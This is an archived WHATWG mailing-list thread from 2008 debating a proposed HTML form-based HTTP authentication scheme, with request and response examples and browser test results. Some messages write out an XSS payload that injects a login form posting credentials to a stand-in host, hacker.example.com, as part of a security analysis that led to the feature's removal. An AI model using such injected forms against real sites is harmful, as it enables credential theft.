On Wed, 26 Nov 2008, Julian Reschke wrote: Ian Hickson wrote: ... As can be seen in the feedback below, there is interest in improving the So when you get to a page that expects you to be logged in, it returns a 401 with: WWW-Authenticate: HTML form=login ...and there must be a form element with name=login, which represents the form that must be submitted to log in. ... For security reasons, I'd prefer that to be the form element, instead of a form element -- having multiple copies of the name in the same document should be considered a fatal error. Having multiple form elements with the same name is already an error. I'm not sure what you mean by fatal error. The spec precisely defines which form should be used in the case of multiple forms with the same name. Could you describe the attack scenario you are considering? Yes, that's a simpler option. :-) (Provided that current browsers still ask for authentication even when given a 200 OK.) I don't think they do now, but it's something we can move towards. I think asking for credentials when the status is 200 would be a bug. Even in the asynchronous way mpt suggested? I think it would go a long way towards addressing the limitations of HTTP authentication. One of the great benefits of HTML authentication forms is that they can be made available in the equivalent of a 200 OK situation as opposed to only in the equivalent of a 401 situation. -- Ian Hickson
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, 26 Nov 2008, Julian Reschke wrote: Ian Hickson wrote: A simple way to achieve it would be to restrict it to username/password pairs, and to have the names of these form parameters live in the response headers as well. We would have to, at a minimum, include the name of the username field, the name of the password field, and the URL of the form to POST to. I am very wary of duplicating information that is already available as it tends to become out of date and thus ends up being even more of a pain than if the information isn't there in the first place. I would expect that information to be autogenerated. I would be very surprised if it was. If it turns out to be widely autogenerated, then I'd be happy to add features to help with that. Anyway, if it's out of sync, authentication is not going to work, so it should be noticed quickly. On the contrary, authentication is going to work fine for 99% of users and it's only when a lone user tries using a bot that it'll break. -- Ian Hickson U+1047E)\._.,--,'``.fL http://ln.hixie.ch/ U+263A/, _.. \ _\ ;`._ ,. Things that are impossible just take longer. `._.-(,_..'--(,_..'`-.;.'
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: Anyway, if it's out of sync, authentication is not going to work, so it should be noticed quickly. On the contrary, authentication is going to work fine for 99% of users and it's only when a lone user tries using a bot that it'll break. Yes, that's what I meant: it will not work for the bot. We apparently disagree how frequently this is going to be used. BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, Nov 26, 2008 at 10:12 AM, Ian Hickson wrote: On Wed, 26 Nov 2008, Julian Reschke wrote: Ian Hickson wrote: ... As can be seen in the feedback below, there is interest in improving the So when you get to a page that expects you to be logged in, it returns a 401 with: WWW-Authenticate: HTML form=login ...and there must be a form element with name=login, which represents the form that must be submitted to log in. ... For security reasons, I'd prefer that to be the form element, instead of a form element -- having multiple copies of the name in the same document should be considered a fatal error. Having multiple form elements with the same name is already an error. I'm not sure what you mean by fatal error. The spec precisely defines which form should be used in the case of multiple forms with the same name. Could you describe the attack scenario you are considering? If I'm not misunderstanding things, there is a new attack scenario: I post a comment on someone's blog, saying <a href="/restricted-access.php?xsshole=<form action=http://hacker.example.com/capture name=login><input name=username><input name=password></form>">crawl me!</a> On their blog's web server, restricted-access.php requires authentication, and unauthenticated access results in a 401 with 'WWW-Authenticate: HTML form=login' and the appropriate login form. But inevitably there's some kind of XSS hole in that page, so arbitrary markup can be inserted above the real login form. (Maybe they pass an error message in a parameter, which will be displayed above the form, but they forgot to escape the output.) Their internal search engine crawler is configured to know a username and password (and the form field names etc) for these restricted areas. It follows the link from my blog comment, it notices the WWW-Authenticate header, and like a good little bot it chooses to parse the HTML page and find the matching form and fill in the fields and submit the login details. 
But actually it's submitting my XSS-inserted form, and sending the login details to me. XSS holes already cause various security vulnerabilities; but they can't currently result in sensibly-written crawlers unwittingly submitting their login details to arbitrary third parties, so this is a new risk. I can imagine a few ways to avoid this problem: 1) Don't write any pages with XSS holes. 2) Detect tampering by refusing to submit login details if >= 2 forms match the name. 3) Only submit login details to same-origin URLs, or to some other restricted set. 4) Configure the crawler with the form submission URL, as well as the form field names and values, so it doesn't have to trust the HTML. 5) Change WWW-Authenticate so it gives all the details (submission URL, field names, etc), so nobody has to trust the HTML. But (1) is not going to happen in reality, so we should try to minimise the damage when XSS holes exist. (2) won't work because the attacker could write '...?xsshole=...<!--' and the second form would be hidden. (3) is more sensible; perhaps the spec should explicitly note that you need to be quite careful about not submitting login forms to third-party sites unless you're sure you trust them? But even with (3), I could write <a href="/restricted-access.php?xsshole=<form action=/public-pastebin.php... and the crawler would send the login details to somewhere on the same host where I could still read them back, which doesn't seem great. So (4) is more sensible. You already have to configure the crawler with the form field names, so you might as well tell it what URL to submit to, and it shouldn't parse the HTML response or care about the form element. (Then there's no need for WWW-Authenticate to even say what the form name is.) (5) is basically the same, except it's late-binding the form details rather than hardcoding them into the crawler's configuration, and so it makes it easy to change the server-side login handling without reconfiguring everyone's crawlers. 
(But the cost of the potential solutions to the vulnerability might be greater than the cost of the vulnerability, so it might not be worth doing anything - I don't have a useful opinion on that.) -- Philip Taylor
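To make options (3) and (4) from the message above concrete, here is a minimal sketch of the check a crawler could run before sending credentials to a form's action URL. The function names and the `configured_login_url` setting are hypothetical, invented for illustration; nothing like them is defined in the HTML5 draft or in this thread.

```python
from urllib.parse import urljoin, urlsplit


def origin(url):
    """Return the (scheme, host, port) triple that identifies an origin."""
    parts = urlsplit(url)
    default_port = {"http": 80, "https": 443}.get(parts.scheme)
    return (parts.scheme, parts.hostname, parts.port or default_port)


def may_submit(page_url, form_action, configured_login_url=None):
    """Decide whether a crawler should send credentials to form_action.

    configured_login_url is a hypothetical per-site setting (option 4).
    When it is set, the action found in the HTML must resolve to exactly
    that URL. When it is not set, fall back to a same-origin check
    (option 3), which the thread notes is weaker.
    """
    target = urljoin(page_url, form_action)
    if configured_login_url is not None:
        return target == configured_login_url
    return origin(target) == origin(page_url)
```

With only the same-origin rule, the injected form pointing at hacker.example.com is rejected but the /public-pastebin.php variant is still accepted, which is the weakness described above; pinning the submission URL in the crawler's configuration rejects both.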
Re: [whatwg] Solving the login/logout problem in HTML
On Tue, 25 Nov 2008 19:54:46 +0100, Julian Reschke wrote: thanks a lot for this proposal which seems to go into the right direction. Indeed. I think this is an area with an enormous potential for improvement and it's very encouraging to see so many great ideas about the issues involved and how to solve them. I didn't yet have time to look into this in detail, but it currently seems to require the UA to still parse the HTML page. Wouldn't it be better if the *headers* of the response (such as WWW-Authenticate, Link, ...) would contain sufficient information to perform the login without having to do that; such as a URI to POST to, plus the parameter names for user name and password? I agree that more should happen on the HTTP level and with more control given to the web application. Considering the state of the next version of the HTTP specification(s), would it perhaps be a good idea to discuss this with the HTTP WG as well? 'WWW-Authenticate: HTML' or something similar is a step in the right direction. I don't see it as necessary to identify the form that does the authentication, though. Just as [1], I think that puts a burden on the user agent that really isn't necessary. Web application developers pull a lot of hair doing web form-based authentication already and are used to having control over just about every part of it. Taking that control and responsibility away at this point is only deterring, imho. Instead, we should leave the control in the hands of the web application developers and force as little as possible on to the user agent developers. 
The way I see it, the following example should be enough to perform a successful authentication:

[Request 1]
GET /administration/ HTTP/1.1

[Response 1]
HTTP/1.1 401 Unauthorized
WWW-Authenticate: HTML realm=Administration

<!DOCTYPE html>
<html>
<form action=/login>
<input name=username>
<input type=password name=password>
<input type=submit>
</form>
</html>

[Request 2]
POST /login HTTP/1.1

username=admin&password=secret

[Response 2]
HTTP/1.1 302 Found
Authorization: HTML QWxhZGRpbjpvcGVuIHNlc2FtZQ== realm=Administration
Location: /administration/

[Request 3]
GET /administration/ HTTP/1.1
Authorization: HTML QWxhZGRpbjpvcGVuIHNlc2FtZQ== realm=Administration

[Response 3]
HTTP/1.1 200 OK

<!DOCTYPE html>
<html>
...
<h1>Welcome!</h1>
</html>

The twist here is that it is up to the server to provide the authentication token and through the 'Authorization' header, give the client a way to authorize future requests. I append the realm parameter to the 'Authorization' header to give the server and client a way to control authorization and more importantly deauthenticate (e.g. logout) for different realms on the same web site. Since more is up to the web application now, a deauthenticate works the following way:

[Request]
POST /logout HTTP/1.1

[Response]
HTTP/1.1 200 OK
Authorization: HTML realm=Administration

<!DOCTYPE html>
<html>
...
<h1>Good bye!</h1>
</html>

The empty token in the 'Authorization' header indicates that it should be forgotten for the given realm by the user agent and that future requests to resources within the same realm require reauthentication. This suggestion overloads the 'Authorization' header quite a bit, but since we're inventing a new authentication scheme that the UA needs to understand anyway, and especially if we get the HTTP WG on board here, I think this can only give positive effects. 
The alternative is to invent a new response header to serve the same purpose, but seeing as the request and response header -- if 'Authorization' is used -- are identical, a typical authentication by a browser supporting the HTML scheme is just opaquely copying and pasting the entire 'Authorization' header from the response to the request. [1] http://www.w3.org/TR/NOTE-authentform -- Asbjørn Ulsberg
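The client-side bookkeeping this proposal implies could look roughly like the sketch below: remember the token the server hands out per realm, replay it on later requests, and forget it when the server sends the header with an empty token. The class and method names are hypothetical, and the parsing assumes the simple space-separated form used in the example (a realm containing spaces would need a real header parser).

```python
class RealmTokens:
    """Per-realm store for tokens received in 'Authorization: HTML ...'."""

    def __init__(self):
        self._tokens = {}

    def update_from_response(self, header_value):
        """Record or forget a token based on a response header value.

        Expected shapes (taken from the example in the message):
          'HTML <token> realm=<name>'  -> remember the token
          'HTML realm=<name>'          -> empty token, forget the realm
        """
        parts = header_value.split()
        if not parts or parts[0] != "HTML":
            return  # not the scheme sketched here
        token, realm = None, None
        for part in parts[1:]:
            if part.startswith("realm="):
                realm = part[len("realm="):].strip('"')
            else:
                token = part
        if realm is None:
            return
        if token is None:
            self._tokens.pop(realm, None)  # logout for this realm
        else:
            self._tokens[realm] = token

    def header_for(self, realm):
        """Return the request header value to send, or None if logged out."""
        token = self._tokens.get(realm)
        if token is None:
            return None
        return f"HTML {token} realm={realm}"
```

Because the value is replayed unchanged, the user agent never has to interpret the token, which matches the "opaque copy" behaviour the message describes.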
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, 26 Nov 2008, Philip Taylor wrote: If I'm not misunderstanding things, there is a new attack scenario: I post a comment on someone's blog, saying <a href="/restricted-access.php?xsshole=<form action=http://hacker.example.com/capture name=login><input name=username><input name=password></form>">crawl me!</a> On their blog's web server, restricted-access.php requires authentication, and unauthenticated access results in a 401 with 'WWW-Authenticate: HTML form=login' and the appropriate login form. But inevitably there's some kind of XSS hole in that page, so arbitrary markup can be inserted above the real login form. (Maybe they pass an error message in a parameter, which will be displayed above the form, but they forgot to escape the output.) Their internal search engine crawler is configured to know a username and password (and the form field names etc) for these restricted areas. It follows the link from my blog comment, it notices the WWW-Authenticate header, and like a good little bot it chooses to parse the HTML page and find the matching form and fill in the fields and submit the login details. But actually it's submitting my XSS-inserted form, and sending the login details to me. XSS holes already cause various security vulnerabilities; but they can't currently result in sensibly-written crawlers unwittingly submitting their login details to arbitrary third parties, so this is a new risk. Hm, this is indeed a problem. I can imagine a few ways to avoid this problem: 1) Don't write any pages with XSS holes. 2) Detect tampering by refusing to submit login details if >= 2 forms match the name. 3) Only submit login details to same-origin URLs, or to some other restricted set. 4) Configure the crawler with the form submission URL, as well as the form field names and values, so it doesn't have to trust the HTML. 5) Change WWW-Authenticate so it gives all the details (submission URL, field names, etc), so nobody has to trust the HTML. 
But (1) is not going to happen in reality, so we should try to minimise the damage when XSS holes exist. (2) won't work because the attacker could write '...?xsshole=...<!--' and the second form would be hidden. (3) is more sensible; perhaps the spec should explicitly note that you need to be quite careful about not submitting login forms to third-party sites unless you're sure you trust them? (3) won't work anyway, since sometimes the login form is cross-domain on purpose (e.g. OpenID). But even with (3), I could write <a href="/restricted-access.php?xsshole=<form action=/public-pastebin.php... and the crawler would send the login details to somewhere on the same host where I could still read them back, which doesn't seem great. So (4) is more sensible. You already have to configure the crawler with the form field names, so you might as well tell it what URL to submit to, and it shouldn't parse the HTML response or care about the form element. (Then there's no need for WWW-Authenticate to even say what the form name is.) (5) is basically the same, except it's late-binding the form details rather than hardcoding them into the crawler's configuration, and so it makes it easy to change the server-side login handling without reconfiguring everyone's crawlers. If we want to go with (4) or (5) then there is no need for this to be bound to an HTML form anymore, and we should remove it from the spec. Is there anyone who can volunteer to edit this section as a separate spec? I guess I'll remove this section. -- Ian Hickson
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, 26 Nov 2008, Jonas Sicking wrote: As I said at the F2F meeting in France, I don't think this is the right way to go. I think moving away from passwords and HTML logins is absolutely necessary. I agree. There are much better identity-based authentication schemes out there. Many do have problems, but these problems can be addressed. Let's address them. I don't know how to do so. I'd much rather find an identity-based solution that can significantly improve the current, really bad, situation regarding authentication. Well, given Philip's description of the security problem, and the observation that it needs to be changed in a way that decouples it from HTML, I'll remove the section soon. If anyone wants to edit it, please, take the text and run with it. -- Ian Hickson
Re: [whatwg] Solving the login/logout problem in HTML
Asbjørn Ulsberg wrote:

[Request 1]
GET /administration/ HTTP/1.1

[Response 1]
HTTP/1.1 401 Unauthorized
WWW-Authenticate: HTML realm=Administration

<!DOCTYPE html>
<html>
<form action=/login>
<input name=username>
<input type=password name=password>
<input type=submit>
</form>
</html>

[Request 2]
POST /login HTTP/1.1

username=admin&password=secret

[Response 2]
HTTP/1.1 302 Found
Authorization: HTML QWxhZGRpbjpvcGVuIHNlc2FtZQ== realm=Administration
Location: /administration/

[Request 3]
GET /administration/ HTTP/1.1
Authorization: HTML QWxhZGRpbjpvcGVuIHNlc2FtZQ== realm=Administration

[Response 3]
HTTP/1.1 200 OK

<!DOCTYPE html>
<html>
...
<h1>Welcome!</h1>
</html>

The twist here is that it is up to the server to provide the authentication token and through the 'Authorization' header, give the client a way to authorize future requests. Your auth token here seems to me to be equivalent to a session cookie. If you change the Authorization header in Response 2 to Set-Cookie (and make some syntactic adjustments) then this doesn't require any changes to how deployed apps handle sessions today.
Re: [whatwg] Solving the login/logout problem in HTML
Julian Reschke wrote: You can already handle the case of content that's available unauthenticated, but would potentially differ in case of being authenticated by adding Vary: Authorization to a response. According to section 14.8 of the HTTP 1.1 specification, the presence of the Authorization header field implies that the response varies by Authorization: When a shared cache (see section 13.7) receives a request containing an Authorization field, it MUST NOT return the corresponding response as a reply to any other request, unless one of the following specific exceptions holds: [some exceptions in the presence of cache-control directives] My understanding of this is that Vary: Authorization is effectively implied for all HTTP responses.
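The cache rule quoted above can be sketched as a small predicate. This is a simplified reading of RFC 2616 section 14.8, not a full cache implementation: the three exceptions it names are the `s-maxage`, `must-revalidate` and `public` cache-control directives, and the revalidation that the first two require before reuse is not modelled here. The function name is hypothetical.

```python
def shared_cache_may_reuse(request_headers, response_cache_control):
    """Return True if a shared cache may reuse the stored response at all.

    request_headers: dict of the headers on the request that produced
    the stored response.
    response_cache_control: the response's Cache-Control header value
    ('' if the header is absent).
    """
    has_authorization = any(
        name.lower() == "authorization" for name in request_headers
    )
    if not has_authorization:
        return True  # the section 14.8 restriction does not apply
    # Directive names only; arguments such as 's-maxage=60' are dropped.
    directives = {
        item.strip().split("=", 1)[0].lower()
        for item in response_cache_control.split(",")
        if item.strip()
    }
    return bool(directives & {"s-maxage", "must-revalidate", "public"})
```

Under this reading, a response to an authenticated request with no cache-control directives is never served to another request by a shared cache, which is the behaviour the message describes as an implied Vary: Authorization.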
Re: [whatwg] Solving the login/logout problem in HTML
Martin Atkins wrote: Asbjørn Ulsberg wrote:

[Request 1]
GET /administration/ HTTP/1.1

[Response 1]
HTTP/1.1 401 Unauthorized
WWW-Authenticate: HTML realm=Administration

<!DOCTYPE html>
<html>
<form action=/login>
<input name=username>
<input type=password name=password>
<input type=submit>
</form>
</html>

[Request 2]
POST /login HTTP/1.1

username=admin&password=secret

[Response 2]
HTTP/1.1 302 Found
Authorization: HTML QWxhZGRpbjpvcGVuIHNlc2FtZQ== realm=Administration
Location: /administration/

[Request 3]
GET /administration/ HTTP/1.1
Authorization: HTML QWxhZGRpbjpvcGVuIHNlc2FtZQ== realm=Administration

[Response 3]
HTTP/1.1 200 OK

<!DOCTYPE html>
<html>
...
<h1>Welcome!</h1>
</html>

The twist here is that it is up to the server to provide the authentication token and through the 'Authorization' header, give the client a way to authorize future requests. Your auth token here seems to me to be equivalent to a session cookie. If you change the Authorization header in Response 2 to Set-Cookie (and make some syntactic adjustments) then this doesn't require any changes to how deployed apps handle sessions today. Perhaps that token was meant as a cross-session one, surviving until an explicit logout
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: ... Ok let me rephrase. What are the user agent requirements for processing the realm value? For other schemes, it's basically show the realm to the user as a hint as to what password is wanted. But here we aren't going to show anything to the user. ... Yes. It's the same as with Basic and Digest when used for a non-interactive login. BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
Martin Atkins wrote: ... By that line of reasoning, you could equally argue that sites don't need this authentication scheme at all since they do just fine without it today. I think this new authentication scheme is most interesting when used in conjunction with other schemes, because it allows the same endpoint to be used for both browsers and other non-browser agents. ... That would be nice in theory, but will be tricky to deploy. The current proposal may fly because it doesn't require browsers to change (well, at least as long as they display the response body when the auth scheme is unknown -- which AFAIU is the case for FF and IE). Once you add a *known* scheme such as Basic or Digest, you'll get the authentication dialogue box most site designers want to avoid. One use-case, which I hinted at in my message, is pages that contain data annotated with microformats. These are useful both to browsers and non-browser agents, but today it's cumbersome to use microformats on pages that require authentication to view, since it is difficult for a non-browser agent to figure out how to log in to an arbitrary site without human intervention. Yes, that's the same case as spiders, WebDAV, feed readers, calendaring clients, whatnot. I went ahead and did some basic testing of this case, anyway. For my initial test, I arranged for my server to send a response like this:

---
HTTP/1.0 401 Unauthorized
Content-type: text/html
WWW-Authenticate: HTML form=login
WWW-Authenticate: Basic realm=test thing

<html>
<head>
<title>Log in</title>
</head>
<body>
<h1>Log in</h1>
<form name=login action=/login.cgi?return_to=/testauth.cgi>
<div>Username: <input type=text name=u /></div>
<div>Password: <input type=text name=p /></div>
</form>
</body>
</html>
---

This case didn't turn out so well:

* IE7: Displayed Basic login dialog
* F3: Displayed Basic login dialog
* O9.5: Displayed Basic login dialog

Yes. 
In all cases, hitting Cancel on the login dialog caused the body to be rendered as a normal page, which is better than nothing but not really ideal. I swapped the ordering so that Basic came before HTML, but the results were the same. (as you'd expect.) I figured though that in most cases if your two types of clients are browsers and non-browser clients, it's quite likely that the non-browser clients will be using OAuth rather than Basic authentication, since that seems to be the big thing right now. I swapped out Basic for OAuth in my second WWW-Authenticate header above, and the results were more promising: * IE7: Rendered the response body as a normal page * F3: Rendered the response body as a normal page * O9.5: Displayed an error: The server requested an authentication method that is not supported. Yes, once the 'other' authentication scheme is new as well, this may work. ... BR, Julian
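The behaviour observed in these tests amounts to each client picking one challenge out of the set the server offers. A non-browser agent could make that choice explicit, as in the sketch below. The function name is hypothetical, and it assumes each WWW-Authenticate header value carries exactly one challenge (real servers may pack several comma-separated challenges into one value, which this does not handle).

```python
def pick_challenge(www_authenticate_values, supported):
    """Choose which challenge to answer.

    www_authenticate_values: list of header values, one challenge each,
    e.g. ['HTML form=login', 'Basic realm=test thing'].
    supported: scheme names the client implements, most preferred first.
    Returns (scheme, params) for the chosen challenge, or None if the
    client supports none of the offered schemes.
    """
    offered = {}
    for value in www_authenticate_values:
        scheme, _, params = value.strip().partition(" ")
        # Keep the first challenge seen for each scheme.
        offered.setdefault(scheme.lower(), params.strip())
    for scheme in supported:
        if scheme.lower() in offered:
            return scheme, offered[scheme.lower()]
    return None
```

A client that only knows Basic answers the Basic challenge and ignores HTML, which mirrors what the three browsers did in the first test; a client that returns None here would presumably fall back to showing the response body.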
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, Nov 26, 2008 at 6:13 PM, Julian Reschke wrote: * IE7: Rendered the response body as a normal page * F3: Rendered the response body as a normal page This behavior is what needs to be specified by this working group. The rest can be handled by authentication specifications. -- Robert Sayre
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: As can be seen in the feedback below, there is interest in improving the experience with logging in and out of Web sites. Currently there are two main mechanisms: HTTP authentication, and cookie-based authentication with a form login. Benefits of form authentication over HTTP authentication: - supports creating an account - supports recovering a lost password - supports showing the login form inline with other content - supports styling the login form - supports an obvious way of logging out from within the page Limitations of form authentication: - no way to indicate that access is being denied because the credentials passed were wrong or because there were no credentials passed - insecure when unencrypted It seems to me that the first limitation of form authentication could be removed by inventing a new WWW-Authenticate challenge that means reply to the form in the page. I have now specified such a value in HTML5 (since it is specific to entity bodies that contain HTML forms): This bit confused the hell out of me. Like Martin Atkins (no relation... probably) suggested, whenever someone's auth is bad for whatever reason I redirect them to the login page, possibly with an error message explaining what went wrong. I would never have imagined trying to solve this problem at the level you're suggesting, nor do I think it is particularly necessary, since every server side language can do a redirect by themselves. ~TJ
Re: [whatwg] Solving the login/logout problem in HTML
Hi Ian, thanks a lot for this proposal which seems to go into the right direction. I didn't yet have time to look into this in detail, but it currently seems to require the UA to still parse the HTML page. Wouldn't it be better if the *headers* of the response (such as WWW-Authenticate, Link, ...) would contain sufficient information to perform the login without having to do that; such as a URI to POST to, plus the parameter names for user name and password? BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
On Tue, 25 Nov 2008, Tab Atkins Jr. wrote: This bit confused the hell out of me. Like Martin Atkins (no relation... probably) suggested, whenever someone's auth is bad for whatever reason I redirect them to the login page, possibly with an error message explaining what went wrong. You can still do that. You also have the opportunity to use a 401 on the login page itself. I would never have imagined trying to solve this problem at the level you're suggesting, nor do I think it is particularly necessary, since every server side language can do a redirect by themselves. It may be that few enough people want to use the HTTP mechanisms for this that the feature will need to be removed when the spec progresses to the next level. On Tue, 25 Nov 2008, Julian Reschke wrote: thanks a lot for this proposal which seems to go into the right direction. I didn't yet have time to look into this in detail, but it currently seems to require the UA to still parse the HTML page. Wouldn't it be better if the *headers* of the response (such as WWW-Authenticate, Link, ...) would contain sufficient information to perform the login without having to do that; such as a URI to POST to, plus the parameter names for user name and password? The problem is that you'd basically have to duplicate the entire form, since login forms can be arbitrarily complex. If the bot has the username and password, why not also give it the username field name, password field name, and login script url? Just consider them part of the credentials. -- Ian Hickson
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: ... I didn't yet have time to look into this in detail, but it currently seems to require the UA to still parse the HTML page. Wouldn't it be better if the *headers* of the response (such as WWW-Authenticate, Link, ...) would contain sufficient information to perform the login without having to do that; such as a URI to POST to, plus the parameter names for user name and password? The problem is that you'd basically have to duplicate the entire form, since login forms can be arbitrarily complex. If the bot has the username and password, why not also give it the username field name, password field name, and login script url? Just consider them part of the credentials. That works in theory, but doesn't scale. For instance, we've been working on a search engine that scans internet sites that may require authentication. Configuring that login for each site would be a maintenance nightmare. So, on the other hand, if the login form is more complex than username + password, what is a bot supposed to do with it? BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: On Tue, 25 Nov 2008, Julian Reschke wrote: The problem is that you'd basically have to duplicate the entire form, since login forms can be arbitrarily complex. If the bot has the username and password, why not also give it the username field name, password field name, and login script url? Just consider them part of the credentials. That works in theory, but doesn't scale. For instance, we've been working on a search engine that scans internet sites that may require authentication. Configuring that login for each site would be a maintenance nightmare. Well for a piece of software of that scale, parsing the document using an off-the-shelf HTML parser and finding the first matching form element and then applying normal HTML semantics to get to the form fields Ugh. Philipp Kempgen
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: For instance, we've been working on a search engine that scans internet sites that may require authentication. Configuring that login for each site would be a maintenance nightmare. Well for a piece of software of that scale, parsing the document using an off-the-shelf HTML parser and finding the first matching form element and then applying normal HTML semantics to get to the form fields seems like a pretty small task in comparison to the rest. Well, that's what we have been doing. I was looking forward where this could be used by somebody who isn't an expert (think Microsoft Webfolder client or Apple WebDAV FS driver), and where running an HTML parser (in the kernel?) would be problematic. So, on the other hand, if the login form is more complex than username + password, what is a bot supposed to do with it? I don't understand why it makes a difference what the form is like. It should apply whatever credentials it has been given -- whatever those might be, username/password, certificate, fake address and phone number, whatever, and submit the form. Just like a user. To do that, it would need to *capture* that information somewhere. I was assuming the whole point in the exercise was to avoid having to pop up an HTML based UI... BR, Julian PS: But even if it doesn't help authenticating without an HTML based UI, this could be useful because it allows non-interactive clients to understand that they're looking at a login form, not the real thing.
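For a sense of how much work "finding the first matching form element" is for a client that can afford a parser, here is a rough sketch using Python's standard-library `html.parser`. It is not an HTML5-compliant parser, the class name is hypothetical, and it only collects `input` elements, so it illustrates the idea rather than the algorithm in the draft.

```python
from html.parser import HTMLParser


class LoginFormFinder(HTMLParser):
    """Collect the action and input fields of the first form whose
    name attribute matches form_name; later forms are ignored."""

    def __init__(self, form_name):
        super().__init__()
        self.form_name = form_name
        self.action = None
        self.fields = []        # list of (name, type) pairs
        self._in_form = False
        self._done = False

    def handle_starttag(self, tag, attrs):
        if self._done:
            return
        attrs = dict(attrs)
        if tag == "form" and not self._in_form:
            if attrs.get("name") == self.form_name:
                self._in_form = True
                self.action = attrs.get("action")
        elif tag == "input" and self._in_form and attrs.get("name"):
            self.fields.append((attrs["name"], attrs.get("type", "text")))

    def handle_endtag(self, tag):
        if tag == "form" and self._in_form:
            self._in_form = False
            self._done = True   # stop after the first matching form
```

A client would feed the 401 response body to `LoginFormFinder("login").feed(body)` and then read `action` and `fields`. Note that taking the first matching form is exactly what the XSS scenario described earlier in the thread exploits, so the result still needs checking before credentials are sent.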
Re: [whatwg] Solving the login/logout problem in HTML
Julian Reschke wrote: Ian Hickson wrote: For instance, we've been working on a search engine that scans internet sites that may require authentication. Configuring that login for each site would be a maintenance nightmare. Well for a piece of software of that scale, parsing the document using an off-the-shelf HTML parser and finding the first matching form element and then applying normal HTML semantics to get to the form fields seems like a pretty small task in comparison to the rest. Well, that's what we have been doing. I was looking ahead to cases where this could be used by somebody who isn't an expert (think Microsoft Webfolder client or Apple WebDAV FS driver), and where running an HTML parser (in the kernel?) would be problematic. So, on the other hand, if the login form is more complex than username + password, what is a bot supposed to do with it? I don't understand why it makes a difference what the form is like. It should apply whatever credentials it has been given -- whatever those might be, username/password, certificate, fake address and phone number, whatever, and submit the form. Just like a user. To do that, it would need to *capture* that information somewhere. I was assuming the whole point in the exercise was to avoid having to pop up an HTML-based UI... PS: But even if it doesn't help authenticating without an HTML-based UI, this could be useful because it allows non-interactive clients to understand that they're looking at a login form, not the real thing. Good points. There are circumstances where the client is not prepared to handle or parse HTML. However, if the client is a human user, you want a nice login page instead of the ugly Basic authentication dialog. Philipp Kempgen
Re: [whatwg] Solving the login/logout problem in HTML
On Tue, 25 Nov 2008, Julian Reschke wrote: Well for a piece of software of that scale, parsing the document using an off-the-shelf HTML parser and finding the first matching form element and then applying normal HTML semantics to get to the form fields seems like a pretty small task in comparison to the rest. Well, that's what we have been doing. I was looking ahead to cases where this could be used by somebody who isn't an expert (think Microsoft Webfolder client or Apple WebDAV FS driver), and where running an HTML parser (in the kernel?) would be problematic. I wouldn't recommend running an HTTP parser in the kernel either. Anywhere where you can safely run an HTTP parser you can run an HTML parser too. So, on the other hand, if the login form is more complex than username + password, what is a bot supposed to do with it? I don't understand why it makes a difference what the form is like. It should apply whatever credentials it has been given -- whatever those might be, username/password, certificate, fake address and phone number, whatever, and submit the form. Just like a user. To do that, it would need to *capture* that information somewhere. I was assuming the whole point in the exercise was to avoid having to pop up an HTML-based UI... Well if you don't have the credentials, you can't really log in anyway. If the request is to be able to take an HTML form and display it to the user as some other UI, then just apply the HTML semantics to the form to get the UI out. That's exactly what HTML is _for_: encoding media- and presentation-independent semantics. PS: But even if it doesn't help authenticating without an HTML-based UI, this could be useful because it allows non-interactive clients to understand that they're looking at a login form, not the real thing. Indeed. -- Ian Hickson U+1047E)\._.,--,'``.fL http://ln.hixie.ch/ U+263A/, _.. \ _\ ;`._ ,. Things that are impossible just take longer. `._.-(,_..'--(,_..'`-.;.'
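[Editorial sketch] The approach discussed in this message (parse the page with an off-the-shelf HTML parser, take the first form, apply the credentials the client was given, and submit) might look roughly like the following in Python. This is only an illustration under stated assumptions: the class and function names are hypothetical, the credentials are assumed to be keyed by the form's own field names, and real form semantics (checkboxes, selects, textareas, character encodings) are deliberately left out.

```python
from html.parser import HTMLParser
from urllib.parse import urlencode, urljoin

# Input types that are not submitted as ordinary data in this simplified model.
SKIPPED_TYPES = {"submit", "button", "reset", "image", "file"}


class FirstFormParser(HTMLParser):
    """Collect action, method and named <input> fields of the first <form>."""

    def __init__(self):
        super().__init__()
        self.in_form = False
        self.done = False
        self.action = ""
        self.method = "get"
        self.fields = {}  # field name -> default value from the markup

    def handle_starttag(self, tag, attrs):
        if self.done:
            return
        attrs = dict(attrs)
        if tag == "form" and not self.in_form:
            self.in_form = True
            self.action = attrs.get("action") or ""
            self.method = (attrs.get("method") or "get").lower()
        elif tag == "input" and self.in_form:
            name = attrs.get("name")
            input_type = (attrs.get("type") or "text").lower()
            if name and input_type not in SKIPPED_TYPES:
                self.fields[name] = attrs.get("value") or ""

    def handle_endtag(self, tag):
        if tag == "form" and self.in_form:
            self.in_form = False
            self.done = True  # ignore any later forms


def build_submission(page_url, html, credentials):
    """Return (target URL, method, urlencoded body) for the first form.

    `credentials` maps field names to values; names the form does not
    contain are ignored, and fields without a credential (for example
    hidden tokens) keep their default value.
    """
    parser = FirstFormParser()
    parser.feed(html)
    data = dict(parser.fields)
    data.update({k: v for k, v in credentials.items() if k in data})
    return urljoin(page_url, parser.action), parser.method, urlencode(data)
```

The caller would then send the returned body to the returned URL with whatever HTTP client it already uses. Hidden fields are carried along unchanged, which is the part that hand-configured field names per site tend to miss.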
Re: [whatwg] Solving the login/logout problem in HTML
